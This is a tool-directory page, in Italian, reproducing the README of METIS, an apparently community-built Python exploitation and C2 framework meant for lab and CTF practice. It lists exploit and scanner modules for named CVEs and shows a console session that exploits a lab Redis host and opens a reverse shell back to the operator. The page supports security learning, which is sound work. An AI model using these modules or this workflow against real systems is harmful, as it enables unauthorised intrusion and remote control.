Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
METIS — Framework di exploitation modulare in Python con una console in stile Metasploit, moduli Exploit e Auxiliary con registrazione automatica, controlli tri-stato e molteplici trasporti di sessione per target da laboratorio e CTF. | Kitploit
Strumenti/GitHubGitHub/k3ystr0k3r/metis
Frameworks per Penetration TestingScanner di VulnerabilitàFramework di ExploitExploitPost-ExploitCTFPenetration TestingCommand and ControlApprendimento e FormazioneRed TeamingStrumento di Accesso RemotoSviluppo Payload
3618h 1m faNon ancora revisionato
GitHubk3ystr0k3r/metis

METIS

Framework di exploitation modulare in Python con una console in stile Metasploit, moduli Exploit e Auxiliary con registrazione automatica, controlli tri-stato e molteplici trasporti di sessione per target da laboratorio e CTF.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

METIS - Framework Modulare di Exploitation & Threat Intelligence

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

Un framework di exploitation in Python creato per l'apprendimento. Architettura modulare, console a tema, molteplici trasporti di sessione e una libreria in crescita di moduli CVE.


Guidato dalla Community

METIS è un framework di ricerca sulla sicurezza guidato dalla community. L'obiettivo è costruire una collezione in crescita di moduli contribuiti da ricercatori di sicurezza, sviluppatori e dalla più ampia community.

Hai uno scanner utile, un modulo ausiliario, un modulo exploit o altri strumenti di ricerca sulla sicurezza che vorresti condividere? Aggiungilo a METIS e apri una Pull Request.

Tutti i contributi sono benvenuti, a condizione che seguano la struttura dei moduli del progetto, gli standard di codifica e le linee guida per l'uso autorizzato.

Che tu stia aggiungendo un nuovo modulo CVE, migliorando un modulo esistente, correggendo un bug o costruendo nuove funzionalità del framework, i tuoi contributi possono aiutare a rendere METIS migliore per tutti.

Vedi Scrivere moduli di seguito per informazioni su come creare il tuo modulo.


Cos'è

METIS è un framework modulare C2/exploitation scritto in Python. Esegue una console interattiva in stile Metasploit dove selezioni moduli, imposti opzioni, esegui controlli e ottieni sessioni contro target di laboratorio.

È progettato per:

  • Apprendimento di come funzionano i framework di exploitation sotto il cofano
  • Lavoro in laboratorio contro VM e container vulnerabili
  • Pratica CTF dove un framework scriptabile è più veloce degli strumenti manuali
  • Contributi della community attraverso moduli personalizzati e miglioramenti del framework

Non è progettato per:

  • Attaccare sistemi che non possiedi o per cui non hai il permesso scritto di testare
  • Ingaggi red-team in produzione (usa Cobalt Strike, Sliver o Mythic)
  • Qualsiasi cosa su internet pubblico

Funzionalità

  • Architettura modulare — inserisci un file .py in modules/ e si registra automaticamente
  • Due tipi di modulo — Exploit (genera sessioni) e Auxiliary (scanner, enumeratori)
  • check() a tre stati — ogni modulo può verificare prima di attaccare (VULNERABLE / SAFE / UNKNOWN)
  • Molteplici trasporti di sessione — socket reverse, socket bind, canali paramiko, webshell HTTP, telnet raw
  • Scansione threaded — specifiche target CIDR/lista separata da virgole/intervallo/file: con barre di progresso live
  • Console a tema — 22 schemi di colore integrati con gradienti della barra di progresso per tema
  • Automazione con file RC — scripta interi flussi di lavoro
  • File SOURCE per modulo — carica opzioni da file KEY=VALUE
  • Escape alla shell locale — esegui qualsiasi comando shell senza lasciare il framework
  • Core snello — dipendenze e astrazioni deliberatamente minime

Moduli

Auxiliary — scanner ed enumeratori

ModuloDescrizione
auxiliary/scanner/tcp_connectScanner di porte TCP threaded
auxiliary/scanner/hikvision_cve_2017_7921Bypass autenticazione telecamera IP Hikvision + enumerazione utenti
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847Leak credenziali MikroTik WinBox
auxiliary/scanner/redis_cve_2022_0543Rilevatore di escape dal sandbox Lua di Redis

Exploit — che generano sessioni

ModuloTipo di sessione
exploit/unix/ftp/vsftpd_234_backdoorSocket bind
exploit/multi/http/ghost_cms_handlebars_rceSocket reverse
exploit/multi/http/langflow_rce_cve_2026_9198Socket reverse
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816Socket reverse
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197Socket reverse
exploit/multi/http/tomcat_put_rce_cve_2017_12615Socket reverse
exploit/multi/http/joomla_jce_rce_cve_2026_48907Webshell HTTP
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819Reverse ritardato (cron)
exploit/linux/redis/redis_cve_2022_0543_rceSocket reverse
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Canale Paramiko
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061Socket telnet raw

Installazione

Richiede Python 3.10+ e git.

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

Esegui:

python3 metis.py

Utilizzo

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)

metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >

Comandi comuni

Scarica lo strumento